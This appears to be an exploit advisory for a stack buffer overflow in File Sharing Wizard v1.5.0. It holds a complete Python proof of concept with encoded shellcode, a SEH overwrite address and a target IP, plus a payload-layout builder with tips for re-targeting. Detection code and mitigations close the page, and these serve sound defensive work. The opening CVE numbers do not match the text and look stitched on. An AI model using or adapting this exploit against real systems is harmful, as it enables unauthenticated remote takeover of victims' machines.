CVE-2019-17415
CVE-2019-16724
CVE-2010-2331
In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.
Exploitation Steps
An attacker can exploit the vulnerability through the following steps:
Identify a target running File Sharing Wizard v1.5.0 whose HTTP service is reachable (TCP port 80 in the PoC below).
Craft a request URI long enough to overflow the stack buffer and overwrite the SEH record: the next-SEH pointer (nSEH) with a short jump and the handler pointer (SEH) with the address of a pop/pop/ret gadget in a module compiled without SafeSEH (MSVCR71.dll in the PoC).
Send the HTTP GET request to the target using a Python script or an exploit framework.
When the overflow raises an exception, the corrupted handler pointer is invoked: pop/pop/ret returns into nSEH, and the short jump there lands in the NOP sled ahead of the shellcode.
Gain remote access via a bind or reverse shell, with the privileges of the running application.
################### PoC ###################
#!/usr/bin/python
import socket

# Bad chars: \x00\x20
#
# nSEH value: \x90\x90\xeb\x08 -> nop; nop; jmp short +8 (lands in the NOP sled after SEH)
#
# SEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ}
#   [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0
#   (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)

seh  = b'\x6d\x57\x37\x7c'   # 0x7c37576d, little-endian
nseh = b'\x90\x90\xeb\x08'   # nop, nop, jmp short +8

# msfvenom-style encoded shellcode (bad chars \x00\x20 excluded)
buf = b""
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb"
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c"
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19"
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11"
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e"
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a"
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77"
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78"
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4"
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f"
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18"
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b"
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf"
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b"
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b"
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde"

# filler | nSEH | SEH | 10-byte NOP sled | shellcode | NOP padding to a fixed tail length
poc = b'A' * 1035 + nseh + seh + b'\x90' * 10 + buf + b'\x90' * (3949 - len(buf))
payload = b'GET //.:/' + poc + b' HTTP/1.0\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.216.135", 80))   # target running File Sharing Wizard v1.5.0
s.send(payload)
s.close()
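The layout the PoC relies on, rebuilt as an added example (this is not the original exploit, nor vendor code): it packs the pop/pop/ret address and the short jump with struct, checks the shellcode against the bad characters the PoC notes, and verifies that the jump lands inside the NOP sled, all without opening a socket. The offsets, handler address and request line are the PoC's; the shellcode is a constructed INT3 stand-in, and the function names are this example's own.

```python
import struct

# Layout constants taken from the PoC on this page (File Sharing Wizard v1.5.0).
OFFSET_TO_NSEH = 1035          # bytes of filler before the nSEH slot
POP_POP_RET = 0x7C37576D       # pop esi / pop edi / ret in MSVCR71.dll (no SafeSEH, no ASLR)
NOP_SLED_LEN = 10              # NOPs placed right after the SEH slot
TAIL_LEN = 3949                # shellcode plus trailing NOP padding
BAD_CHARS = b"\x00\x20"        # NUL ends the C string; a space ends the request URI

# Constructed stand-in for shellcode: INT3 breakpoints, not the page's payload.
DEMO_SHELLCODE = b"\xcc" * 32


def short_jump(displacement):
    """Encode 'jmp short rel8' (EB xx); rel8 is relative to the end of the 2-byte instruction."""
    if not -128 <= displacement <= 127:
        raise ValueError("jmp short displacement must fit in a signed byte")
    return b"\xeb" + struct.pack("<b", displacement)


def check_bad_chars(shellcode, bad=BAD_CHARS):
    """Return the offsets of bytes in shellcode that would break the request."""
    return [i for i, c in enumerate(shellcode) if c in bad]


def landing_offset(jump_disp):
    """Offset in the payload where the nSEH short jump transfers control."""
    # nSEH = nop, nop, jmp short <disp>; the jmp instruction ends at nSEH + 4.
    return OFFSET_TO_NSEH + 4 + jump_disp


def build_seh_payload(shellcode, jump_disp=8):
    """Assemble filler | nSEH | SEH | NOP sled | shellcode | padding, as the PoC does."""
    bad = check_bad_chars(shellcode)
    if bad:
        raise ValueError("bad characters at offsets %r" % (bad,))
    if len(shellcode) > TAIL_LEN:
        raise ValueError("shellcode does not fit in the tail")
    sled_start = OFFSET_TO_NSEH + 8            # after the 4-byte nSEH and 4-byte SEH
    land = landing_offset(jump_disp)
    if not sled_start <= land < sled_start + NOP_SLED_LEN:
        raise ValueError("jump would land outside the NOP sled")
    nseh = b"\x90\x90" + short_jump(jump_disp)
    seh = struct.pack("<I", POP_POP_RET)       # little-endian handler pointer
    return (b"A" * OFFSET_TO_NSEH + nseh + seh + b"\x90" * NOP_SLED_LEN
            + shellcode + b"\x90" * (TAIL_LEN - len(shellcode)))


def build_request(payload):
    """Wrap the payload in the request line the PoC uses; nothing is sent."""
    return b"GET //.:/" + payload + b" HTTP/1.0\r\n\r\n"


if __name__ == "__main__":
    p = build_seh_payload(DEMO_SHELLCODE)
    print("payload length:", len(p), "nSEH at", OFFSET_TO_NSEH,
          "jump lands at", landing_offset(8),
          "shellcode at", OFFSET_TO_NSEH + 8 + NOP_SLED_LEN)
```

The two checks are the ones that usually go wrong when a payload like this is re-targeted: a space or NUL anywhere in the shellcode truncates the URI before the handler is ever overwritten, and a displacement that misses the sled lands in the handler pointer or past the NOPs.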
Recommended Mitigations:
Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.
Apply vendor patches or consider replacing the software if no fix is available.
Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.
Monitor logs and network traffic for anomalous GET requests targeting the service.
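A detection check of the kind the last mitigation calls for, added here and not part of the original advisory: it parses raw HTTP request lines and flags the traits this exploit cannot avoid (an oversized request URI, a long run of one repeated filler byte, non-printable bytes in the URI). The thresholds and the sample requests are constructed assumptions for illustration, not observed traffic.

```python
import re

# Assumed thresholds; tune them to the service's real traffic.
MAX_URI_LEN = 1024      # File Sharing Wizard paths are short; the PoC URI is over 5000 bytes
MAX_RUN_LEN = 64        # one byte repeated this often in a URI is overflow padding

# Request-line grammar: METHOD SP request-target SP HTTP/x.y CRLF
REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/(?P<ver>\d\.\d)\r?\n")

# Constructed sample traffic: a benign request, one shaped like the PoC
# (filler, nSEH, SEH, NOP sled, shellcode left out), and a benign POST.
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.1\r\nHost: fileshare.example\r\n\r\n",
    b"GET //.:/" + b"A" * 1035 + b"\x90\x90\xeb\x08" + b"\x6d\x57\x37\x7c"
    + b"\x90" * 20 + b" HTTP/1.0\r\n\r\n",
    b"POST /upload HTTP/1.1\r\n",
]


def longest_run(data):
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best_byte, best_len, cur_byte, cur_len = None, 0, None, 0
    for c in data:
        cur_byte, cur_len = (c, cur_len + 1) if c == cur_byte else (c, 1)
        if cur_len > best_len:
            best_byte, best_len = cur_byte, cur_len
    return best_byte, best_len


def analyze_request_line(raw):
    """Return a dict of findings for one raw request; an empty dict means nothing suspicious."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return {"unparseable_request_line": raw[:32]}
    uri = m.group("uri")
    findings = {}
    if len(uri) > MAX_URI_LEN:
        findings["oversized_uri"] = len(uri)
    byte, run = longest_run(uri)
    if run >= MAX_RUN_LEN:
        findings["repeated_byte_run"] = (byte, run)
    # Anything outside 0x21..0x7E is not a legitimate URI byte: NOPs, jumps,
    # shellcode and non-ASCII address bytes all land here.
    non_printable = sum(1 for c in uri if c < 0x21 or c > 0x7E)
    if non_printable:
        findings["non_printable_bytes"] = non_printable
    return findings


def scan(requests):
    """Return {index: findings} for every request that triggers at least one finding."""
    flagged = {}
    for i, raw in enumerate(requests):
        findings = analyze_request_line(raw)
        if findings:
            flagged[i] = findings
    return flagged


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS).items():
        print("request %d flagged: %r" % (idx, findings))
```

Run this over request lines captured on the wire or from a proxy or IDS extract rather than over the application's own logs: access logs are commonly truncated or URL-encoded, which hides exactly the bytes this check keys on, and a process that has just been exploited may not log the request at all.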
Conclusion
This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk due to its unauthenticated nature and potential for full system compromise.
Reporting Information:
Affected Versions: File Sharing Wizard v1.5.0, tested on:
- Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002
- Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601